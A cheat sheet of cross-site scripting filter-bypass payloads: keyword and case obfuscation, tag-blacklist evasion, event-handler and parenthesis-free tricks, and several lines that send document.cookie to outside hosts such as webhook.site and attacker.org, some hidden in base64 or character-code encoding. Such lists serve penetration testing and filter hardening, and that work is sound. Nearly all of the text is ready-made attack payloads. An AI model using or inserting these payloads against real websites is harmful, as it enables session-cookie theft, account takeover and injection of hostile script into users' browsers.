
XSS - Filter Bypass

Keyword

js
\u0061lert(1) // alert(1)

Redirection

js
location.href="//URL"
location="//URL"
document.location="//URL"
window.location.assign("//URL")
window['location']['href']=
document.location.replace()
window.open("link", "_blank");
window['location']['href']="//URL"
js
document.cookie 
document['cookie']
with(document)alert(cookie)
doc\u0075ment.cookie
doc\u0075ment['cookie']
window["doc"+"ument"]["cookie"]

Concat

js
fetch("//webhook.site/?c="+document.cookie)
fetch("//webhook.site/?c=".concat(document.cookie))
fetch("//webhook.site/?c=", document.cookie.join())
fetch(`//webhook.site/?c=${document.cookie}`)
js
// exfiltration bypass
fetch(atob('Ly93ZWJob29rLnNpdGUvVVJMP2Nvb2tpZT0=').concat(document.cookie))
fetch('//attacker.org', { method: 'POST', mode: 'no-cors', body:document.cookie }) // no-cors

Wrapper

js
JaVaScript:alert(1)
ja	vascript:alert(1)
java\tscript:alert(1)
javascript:alert('XSS')

ja
vascript:alert(1) # CRLF

# colon
javascript:alert()
javascript:alert()

Eval call

js
eval.call(undefined, "alert(1)") // indirect call of eval: the string is evaluated in the global scope
eval.call(window, 'alert(1)') // same effect even when invoked from inside a function (an indirect eval does not see the local scope)
(0,eval)('alert(1)') // equivalent indirect-eval form

String.fromCharCode()

js
// String.fromCharCode() takes base-10 character codes; the decoded keyword never appears
// literally in the payload, which is why a plain keyword filter does not match it
// (filtering on keywords is not a substitute for contextual output encoding and a CSP)

String.fromCharCode(97,108,101,114,116) // char codes in base 10

'- eval(String.fromCharCode(97,108,101,114,116))('XSS')//

Case sensitive

html
<sCrIpt>alert(1)</ScRipt>
<sVg/onload=alert(1)>

Useful when the developer checks for the presence of a tag name with a case-sensitive regex, for example.

Bypass Tag Blacklist

html
<script x>
<script x>alert('XSS')<script y>

JS Content

js
%27%2Balert(1)%2B%27
^alert(1)//
*alert(1)//
.concat(alert(1))//

DOM Based

html
<scr<script>ipt>alert('XSS')</scr<script>ipt>

<svgonload=alert(1)> # with ff char
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>

<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>

Auto Focus Bypass

html
<button autofocus onfocus=write(atob(&quot;PHNjcmlwdD53aW5kb3cubG9jYXRpb249Jy8vd2ViaG9vay5zaXRlL1VSTD9jb29raWU9Jytkb2N1bWVudC5jb29raWU8L3NjcmlwdD4=&quot;))>
<button autofocus onfocus=(eval)(atob(/base64/.source))>
<button autofocus onfocus=[JS FUCK]>
<button autofocus onfocus=eval/**/(alert/**/(atob(/**/"BASE64")))>
<button onfocus=location=textContent+cookie autofocus> http://xxx?cookie= </button>
html
<keygen autofocus onfocus=write(atob(&quot;PHNjcmlwdD50b3AubG9jYXRpb249Jy8vc2VuZC5oZXJlLm1lPycrZG9jdW1lbnQuY29va2llPC9zY3JpcHQ+&quot;))>

<keygen autofocus onfocus=document.write(String.fromCharCode(39,60,105,109,103,32,115,114,99,61,34,104,116,116,112,115,58,47,47,104,116,116,112,114,101,113,46,99,111,109,47,111,100,100,45,108,101,97,102,45,121,100,101,49,102,117,55,112,47,114,101,99,111,114,100,63,99,109,100,61,39)+document.cookie+String.fromCharCode(39,34,119,105,116,100,104,61,48,32,104,105,103,104,116,61,48,32,98,111,114,100,101,114,61,48,32,47,62,39))/>

Chars Filter

Bypass Dot Filter

html
<script>window['alert'](document['domain'])</script>

<!-- Base64 encoding -->
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>

<script nonce="PHNjcmlwdCBubzIxLTQtMjAyNQ==">location=atob("Ly9vcGVuLXRyYWNlLmNvbS9jcmVhdGUtcmVxdWVzdC8wMWpzYm0xaGh5cDF3NHFoZmtuN3luNDkwbj9jb29raWU9")%2Bwindow["doc"%2B"ument"]["cookie"]</script>

Bypass ' " `

js
atob(/base64/.source)

Bypass Parentheses

js
alert`1`
setTimeout`alert\u0028document.domain\u0029`;
document.location="javascript:alert%2845%29"
onerror=alert;throw 45

Parentheses and Semi Colon

html
<script>onerror=alert;throw 1337</script>
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>